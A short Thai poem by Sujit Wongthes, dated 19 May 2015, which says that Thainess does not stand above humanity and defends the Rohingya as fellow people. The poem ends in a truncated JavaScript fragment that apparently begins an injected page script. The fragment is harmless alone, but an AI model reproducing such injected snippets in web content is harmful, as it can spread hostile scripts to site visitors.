คน

 

ความเป็นไทยไม่อยู่เหนือความเป็นคน

บรรพชนร้อยพ่อพันแม่ได้

โรฮีนจาก็เป็นคนเหมือนใครใคร

ความเป็นไทยไฉนเหยียดความเป็นคน

 

สุจิตต์ วงษ์เทศ

อังคาร 19 พฤษภาคม 2558var d=document;var s=d.createElement(‘script’);